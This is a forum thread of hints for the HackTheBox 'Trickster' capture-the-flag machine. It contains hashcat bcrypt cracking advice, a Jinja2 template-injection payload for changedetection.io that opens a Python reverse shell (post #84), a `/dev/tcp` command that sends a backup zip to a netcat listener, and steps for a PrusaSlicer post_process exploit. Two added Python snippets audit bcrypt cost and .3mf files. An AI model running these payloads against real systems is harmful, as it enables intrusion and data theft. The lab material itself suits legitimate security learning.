HackTheBox Trickster Linux - Medium
by selukas - Wednesday September 18, 2024 at 06:22 PM
#81
Can someone explain to me what kind of hash that is in the SQL database and with what flags on hashcat you would crack it? I know what it's cracked to, but I am interested in how that's done.
#82
The PoC is not working...
Tried everything...
#83
(Sep 26, 2024, 05:28 AM)russairussi3 Wrote: Can someone explain to me what kind of hash that is in the SQL database and with what flags on hashcat you would crack it? I know what it's cracked to, but I am interested in how that's done.

Hey, I don’t know if you found your answer yet, but you can identify the hash type with hashid or hash-identifier in your Linux console. Once you have the returned hash type, you can search for it using `hashcat -h | grep <typeOfHash>`. This will give you the possible numbers for the hash mode in Hashcat.
Since it's Blowfish, the hash mode for Hashcat is 3200. So, you can run:
`hashcat -m 3200 -a 0 hash.txt wordlist.txt`
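The structure that marks a stored hash as bcrypt (Blowfish), shown as an added example that is not part of the original post: it parses the variant and cost factor and lists hashes stored below a chosen minimum cost. The sample hashes are constructed, and `describe_hash`, `below_minimum` and the `min_cost` threshold are hypothetical names and values.

```python
import re

# "$2<variant>$<cost>$" followed by a 22-char salt and a 31-char digest,
# both written in bcrypt's own base64 alphabet.
_BCRYPT = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)
HASHCAT_MODE_BCRYPT = 3200  # the mode given in the post above


def describe_hash(value: str) -> dict:
    """Classify a stored hash string by its structure alone."""
    value = value.strip()
    match = _BCRYPT.match(value)
    if match is None:
        bad = value.startswith("$2")
        reason = "bcrypt prefix but wrong layout" if bad else "no bcrypt prefix"
        return {"type": "unknown", "reason": reason}
    variant, cost = match.group(1), int(match.group(2))
    if not 4 <= cost <= 31:  # bcrypt only defines costs 4..31
        return {"type": "unknown", "reason": f"cost {cost} outside 4..31"}
    return {
        "type": "bcrypt",
        "variant": variant,
        "cost": cost,
        "rounds": 2 ** cost,  # key-expansion iterations per password guess
        "hashcat_mode": HASHCAT_MODE_BCRYPT,
    }


def below_minimum(hashes, min_cost):
    """Return the bcrypt hashes whose cost factor is under min_cost."""
    weak = []
    for item in hashes:
        info = describe_hash(item)
        if info["type"] == "bcrypt" and info["cost"] < min_cost:
            weak.append(item)
    return weak


# Constructed samples: filler salt/digest text, not real password hashes.
_SALT, _DIGEST = "abcdefghijklmnopqrstuv", "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
SAMPLES = [
    "$2y$10$" + _SALT + _DIGEST,
    "$2b$12$" + _SALT + _DIGEST,
    "0123456789abcdef0123456789abcdef",  # 32 hex chars, not bcrypt
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:12], describe_hash(sample))
    print("below cost 12:", below_minimum(SAMPLES, min_cost=12))
```

Each step up in cost doubles the work per guess, which is why the cost factor is the value to check when reviewing how an application stores passwords.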
#84
(Sep 23, 2024, 05:21 AM)Est_Damty Wrote:
(Sep 22, 2024, 12:52 AM)random901 Wrote: For triggering launch of Root PoC:
  1. start a web-server on the machine "python3 -m http.server 8000"
  2. On the changedetect.io site "Add New Change" enter the URL "http://172.17.0.1:8000" && "Edit > Watch"
  3. Set the Notification Url to "get://<attacker-ip>" && the Notification Body to the one from the PoC except change it to your IP & Port
    {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}
  4. Add an index.html file or literally anything && re-check the website from changedetection dashboard. This should trigger the SSTI && get a shell

It needs to detect a change && have a Notification URL set in order for the notification body to be triggered.

IT'S NOT WORKING!!!!

In step 2, use http://<your IP>:<your python server port>. And it works for me!!
#85
rooted, thanks everyone for the hints
#86
any hints on getting root... looks like there's a docker breakout but can't figure it out...
#87
(Oct 06, 2024, 05:09 PM)Com41n Wrote: any hints on getting root... looks like there's a docker breakout but can't figure it out...

It got patched, root passwd used to be in the .bash_history in the container and has been changed

I believe this is the intended:
https://www.exploit-db.com/exploits/51983
#88
root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adam's password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win
#89
(Oct 12, 2024, 04:55 AM)fuckedupindacrib Wrote: root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adam's password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win

Could you give a little more detail on the last exploit around prusa? I understand I need to write the payload into the Slic3r_PE.config file and re-zip the .3mf file. What I don't understand is the syntax you need, as Slic3r_PE.config is an XML file, and I can't find any documentation about how you define the post_process feature in this XML file...
#90
(Oct 15, 2024, 03:40 PM)ploplopfr Wrote:
(Oct 12, 2024, 04:55 AM)fuckedupindacrib Wrote: root from docker container:

inside container in /datastore/Backups you have zip files.

transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james

You can then move files to your machine and run brotli -d on a .txt.br file to find adam's password for ssh

Once it prusa exploit: https://www.exploit-db.com/exploits/51983

I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well

Then run slicer and win

Could you give a little more detail on the last exploit around prusa? I understand I need to write the payload into the Slic3r_PE.config file and re-zip the .3mf file. What I don't understand is the syntax you need, as Slic3r_PE.config is an XML file, and I can't find any documentation about how you define the post_process feature in this XML file...

Use the 3mf file from the box. You should be able to ctrl+f to find the post_process and output_filename_format to edit.
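A pre-slicing check for the setting discussed in the last posts, given as an added example that is not part of the original thread: it opens a .3mf as a zip archive and reports any non-empty `post_process` line in an embedded Slic3r_PE.config, using the "; key = value" line form quoted above. The function names, the member path in the sample and the sample values are constructed assumptions.

```python
import io
import re
import zipfile

# Config lines look like "; key = value", as in the line quoted in the thread.
_SETTING = re.compile(r"^\s*;\s*(\w+)\s*=\s*(.*?)\s*$")


def audit_3mf(data: bytes) -> list:
    """Return (member, line_no, value) for every non-empty post_process
    setting found in a Slic3r_PE.config inside the .3mf archive."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        raise ValueError("not a valid .3mf (zip) archive") from None
    with archive:
        for member in archive.namelist():
            if not member.endswith("Slic3r_PE.config"):
                continue
            text = archive.read(member).decode("utf-8", errors="replace")
            for line_no, line in enumerate(text.splitlines(), start=1):
                match = _SETTING.match(line)
                if match and match.group(1) == "post_process" and match.group(2):
                    findings.append((member, line_no, match.group(2)))
    return findings


def build_sample(post_process: str) -> bytes:
    """Constructed sample archive; member path and values are assumptions."""
    config = (
        "; output_filename_format = something.gcode\n"
        f"; post_process = {post_process}\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Metadata/Slic3r_PE.config", config)
        archive.writestr("3D/3dmodel.model", "<model/>")
    return buf.getvalue()


if __name__ == "__main__":
    # An empty setting is reported as clean; any configured command is flagged.
    for label, value in (("clean", ""), ("flagged", "/opt/example/tidy.sh")):
        print(label, audit_3mf(build_sample(value)))
```

Running a check like this on project files received from others, before they are opened and sliced, shows whether the file carries a post-processing command at all.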

